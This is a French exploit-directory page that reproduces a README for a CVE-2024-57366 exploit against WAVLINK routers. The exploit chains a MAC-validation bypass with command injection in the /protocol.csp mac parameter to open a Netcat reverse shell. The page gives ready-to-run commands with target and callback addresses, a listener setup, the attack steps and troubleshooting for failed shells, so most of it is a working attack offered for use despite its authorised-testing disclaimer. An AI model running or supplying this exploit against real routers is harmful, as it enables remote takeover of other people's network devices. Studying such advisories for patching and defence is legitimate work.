Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-57366 — Exploit d'exécution de code à distance pour CVE-2024-57366 ciblant les routeurs WAVLINK via un contournement de validation d'adresse MAC et une injection de commandes, avec enregistrement WiFi automatique et livraison de payload de shell inversé. | Kitploit
Outils/GitHubGitHub/h4ckusaur/cve-2024-57366
Sécurité IoTAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité Sans FilTests d'IntrusionCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
GitHubh4ckusaur/cve-2024-57366

CVE-2024-57366

Exploit d'exécution de code à distance pour CVE-2024-57366 ciblant les routeurs WAVLINK via un contournement de validation d'adresse MAC et une injection de commandes, avec enregistrement WiFi automatique et livraison de payload de shell inversé.

3il y a 11 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt

Exploit CVE-2024-57366

Un exploit robuste pour CVE-2024-57366 permettant l'exécution de code à distance sur les routeurs vulnérables via un contournement de la validation des adresses MAC et une injection de commandes.

Il s'agit d'un exploit post-authentification qui nécessite que la fonction « Remote Control » (contrôle à distance) du routeur soit activée, ainsi que le mot de passe administrateur. Le nom d'utilisateur administrateur est codé en dur sur « admin ».

🚀 Fonctionnalités

  • Enregistrement automatique des adresses MAC - Se connecte au WiFi pour enregistrer l'adresse MAC auprès du routeur
  • Exploit préservant le réseau - Maintient vos connexions réseau existantes pendant l'exploitation
  • Cache d'adresses MAC - Réalise rapidement des exploits répétés en utilisant les adresses MAC réussies en cache
  • Compatible BurpSuite - Correspond au format de requête exact pour une fiabilité maximale
  • Gestion des délais d'attente - Messages utiles lorsque des connexions reverse shell sont attendues
  • Convivial - Cache d'adresses MAC simple en texte pour une gestion facile

📋 Prérequis

  • Python 3.6+
  • Système Linux avec adaptateur sans fil
  • Accès sudo (requis pour la gestion des interfaces réseau)
  • Routeur cible vulnérable à CVE-2024-57366

🛠️ Installation

  1. Clonez ou téléchargez les fichiers de l'exploit
  2. Assurez-vous de disposer des paquets Python requis :
    root@kitploit:~
    pip3 install requests
    

🎯 Utilisation

Exploit de base (première fois)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

Exploit rapide (avec MAC en cache)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Script will ask: "Use cached MAC for quick exploit? (y/n):" - say "y"

Forcer l'exploit complet (ignorer le cache)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full

Lister les adresses MAC en cache

root@kitploit:~
python3 exploit.py --list-cached

📖 Options de la ligne de commande

  • --target - Adresse IP du routeur cible (défaut : 127.0.0.1)
  • --port - Port du routeur cible (défaut : 80)
  • --local-ip - Votre adresse IP locale pour le callback du reverse shell
  • --local-port - Port local pour le callback du reverse shell (défaut : 4444)
  • --password - Mot de passe administrateur du routeur
  • --ssid - Nom du réseau WiFi (défaut : WAVLINK-Mesh_DC4B)
  • --force-full - Force l'exploit complet, ignore la vérification du MAC en cache
  • --list-cached - Liste les adresses MAC en cache et quitte

🔧 Comment ça fonctionne

Aperçu technique

CVE-2024-57366 exploite un contournement de la validation des adresses MAC dans le firmware du routeur. La vulnérabilité permet une injection de commandes via le paramètre mac dans le point de terminaison /protocol.csp.

Processus de l'exploit

  1. Authentification - Extrait le jeton d'authentification du routeur
  2. Réinitialisation du mot de passe WiFi - Réinitialise le mot de passe WiFi du routeur pour correspondre au mot de passe administrateur
  3. Enregistrement MAC - Se connecte au WiFi pour enregistrer l'adresse MAC auprès du routeur
  4. Injection de commandes - Injecte la charge utile du reverse shell en utilisant le MAC enregistré
  5. Préservation du réseau - Maintient les connexions réseau existantes tout au long du processus

Détails techniques clés

  • Contournement de la validation MAC : Le routeur valide les adresses MAC en vérifiant si elles se sont connectées au WiFi
  • Liaison d'interface réseau : Utilise l'interface eth0 pour préserver le contexte réseau d'origine
  • Format de requête : Correspond exactement au format BurpSuite (index=1, jeton dans le chemin de l'URL)
  • Charge utile : Reverse shell Netcat avec tube nommé (named pipe) pour la fiabilité

Mise en cache des adresses MAC

L'exploit met automatiquement en cache les adresses MAC réussies dans successful_macs.txt :

root@kitploit:~
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here

32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08

Ajout manuel de MAC : Modifiez successful_macs.txt et ajoutez des lignes comme :

root@kitploit:~
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08

🎯 Exemple d'utilisation

Première tentative d'exploit

root@kitploit:~
# Start netcat listener
nc -lvp 4444

# Run exploit
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

# When prompted to save MAC address, say "y"

Exploits suivants (beaucoup plus rapides)

root@kitploit:~
# Start netcat listener
nc -lvp 4444

# Run exploit (will use cached MAC)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Say "y" when asked about using cached MAC

🔍 Dépannage

Problèmes courants

  1. « Aucun adaptateur sans fil trouvé »

    • Assurez-vous qu'un adaptateur sans fil est activé
    • Vérifiez que le WiFi est activé
    • Essayez d'exécuter avec sudo
  2. « Échec de la validation de l'adresse MAC »

    • L'adresse MAC doit être enregistrée auprès du routeur
    • Assurez-vous que l'étape de connexion WiFi s'est terminée avec succès
    • Essayez d'abord de vous connecter manuellement au WiFi
  3. « Délai de requête dépassé »

    • Cela peut en fait signifier que l'exploit a fonctionné !
    • Vérifiez votre écouteur netcat pour une connexion reverse shell
    • Le routeur exécute peut-être la commande mais ne répond pas en HTTP
  4. « Le reverse shell ne se connecte pas »

    • Vérifiez que votre --local-ip est correct (utilisez ip addr show eth0)
    • Assurez-vous qu'aucun pare-feu ne bloque la connexion
    • Vérifiez que l'écouteur netcat fonctionne sur le bon port

Exigences réseau

  • Interface eth0 : Doit avoir une adresse IP pour la préservation du réseau
  • Adaptateur sans fil : Requis pour l'enregistrement MAC initial
  • Accès au routeur : Doit pouvoir atteindre le routeur via l'interface eth0

📁 Structure des fichiers

root@kitploit:~
CVE-2024-57366/
├── exploit.py              # Main exploit script
├── successful_macs.txt     # MAC address cache (auto-generated)
└── README.md              # This file

⚠️ Avertissement

Cet outil est destiné uniquement à des fins éducatives et de tests autorisés. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de tester. Les auteurs ne sont pas responsables de toute mauvaise utilisation de cet outil.

🔗 Références

  • CVE-2024-57366
  • Vulnérabilité du firmware du routeur dans la validation des adresses MAC
  • Injection de commandes via le point de terminaison /protocol.csp

📝 Licence

Ce projet est fourni tel quel à des fins éducatives. Utilisez-le de manière responsable et conformément aux lois et réglementations applicables.

Télécharger l’outil